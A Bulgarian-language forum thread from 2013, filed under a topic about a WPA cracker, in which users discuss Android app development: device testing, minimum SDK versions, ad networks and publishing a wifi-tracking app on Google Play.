Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в May 10, 2013, 11:19
Здравей Remotex,благодаря за програмката и най-важното за написаното на смилаем Бг.език пояснение за ядрата и нишките.
Цитат
публикувано от Gat3way
Също така и нямам намерение да се изхранвам с писане на мобилни приложения, имам си друга, съвсем различна работа и това е по-скоро отскорошно хоби.
Gat3way,най-малко аз искам да ти дам наклон в каква посока да върви живота ти човек,просто исках да кажа това само като инфо,нищо повече.
Цитат
публикувано от Gat3way
Нокия няма да си взема, па макар и с нормален линукс отгоре.
Живеем в демократичен свят,и аз уважавам избора ти

Благодаря и двама ви за подорбните обяснения,макар че ако трябва да бъда искрен със себе си,повечето от процесите които вие описвате на нормален потребител,му звучат като попаднъл на изпит по висша мтематика,а пък той знае само таблицата за умножение(говоря за себе си).Това ми напомня колко човек трябва да се рови и чете,за да проумее едва няколко % от това което вие обсъждате,но какво да се прави майката му е труд,а не чупки в кръста и гюбеци


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 11, 2013, 00:02
А, само още нещо да питам, тук не може да няма поне няколко Android девелопъра дето се скатават :)

Преди малко тествах приложението на Samsung Galaxy S3....трябва да кажа че съм очарован. Очаквах да е голяма кочина в сравнение с 7" таблет, всичко да е разместено, мащабите да са преебани, но нямаше нищо такова, единствено един бутон, който аз сам си scale-вам излиза прекалено голям и textview-та където съм слагал табулации ("\t") излизат кофти разместени. Не знам дали не съм имал късмет де.

Та в този ред на мисли искам да питам, вие преди да пуснете нещо предполагам го тествате на различни устройства. Тъй като разбираемо (понеже не ми е занимание) нямам 50 телефона и 20 таблета вкъщи, как бихте препоръчали да се тества? Емулатора достатъчно добра работа ли върши?

Също така голяма загуба ли ще е ако му нашия да ползва minimumsdk=14 (демек 4.0)? При цялото ми старание да подържам по-стари версии (което е ужасна мъка, actionbarsherlock вместо нормалния actionbar, някакви изкривени заобиколни методи да си върша нещата), не е толкова лесно. До 3.2 някак нещата са ОК, въпреки че под 4.0, излиза по-грозно. Имам един wildfire с Froyo, там просто не мога да го накарам да върви, колкото и да се мъча, накрая ми писна да се опитвам. Та в най-добрият случай до 3.2 май ще е.

Гледах някакви графики, според които огромна част от устройствата са с GingerBread. Това май не е много на добре.



Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: n00b в May 11, 2013, 01:26
4.0+ е чудесно!

Да - тества се на 10-тина устройства и на всички има "дребни" проблеми, после нов цикъл и нов и нов и т.н.

Почти всички 3.Х устройства минаха на 4.0, но тези от 2.Х не! Обаче 2.х е "преисторически" - ако започнеш да го поддържаш ще излезе някой с молба да поддържаш и 1.х... ще го направиш ли? Мога да ти осигуря апарат (не, не се шегувам).

Рекламните! Ако ти направиш малки е губи време... рекламите на цял екран са добри и падат кликове. Рекламата трябва да се публикува на няколко минути или клика за да имаш ти самия посещения и приходи. Инак кинти няма да получиш. Да ти пратя ли няколко мрежи?


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 11, 2013, 02:11
Да, нямам нищо напротив :)

Мрежите имах предвид де :)

Много ми е забавен този момент с андроида, има два варианта с UI-то, единия е да разчиташ на XML-и, които inflate-ваш, другия е динамично да си създаваш нещата. Това е малко тъпотия според мен. Това с XML-ите все повече  ме дразни, не знам защо. Като цяло обаче ми е забавна цялата идея, много ме е яд че не знаех за тези неща по-отдавна. Изглежда голяма забава.

Апропо, излиза че ако искаш можеш да пускаш платени приложения в амазон, но не и в гугъл. Това също ми е доста забавно.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 22, 2013, 01:08
Ммммм това е засега:

https://play.google.com/store/apps/details?id=com.gat3way.wifitrack


Има още доста да се изпипва обаче....


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: n00b в May 22, 2013, 01:55
ТЪПО!

Не мога да те намеря през търсачката на Play-a и за по-бързо минах оттук.

Има и проблем при изчертаването на графиките ама трябва да ти пратя шотове. Дай мейл.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 22, 2013, 08:41
Пробвай тук: gat3way_в_gmail.com

Това с търсачката иначе нямам идея как и защо работи. Тезата ми беше че отнема някакво време на google, ама може и аз да съм оплескал нещата (за пръв път ми е все пак).


редакция от neter: Редактиран адрес, като защита от спам.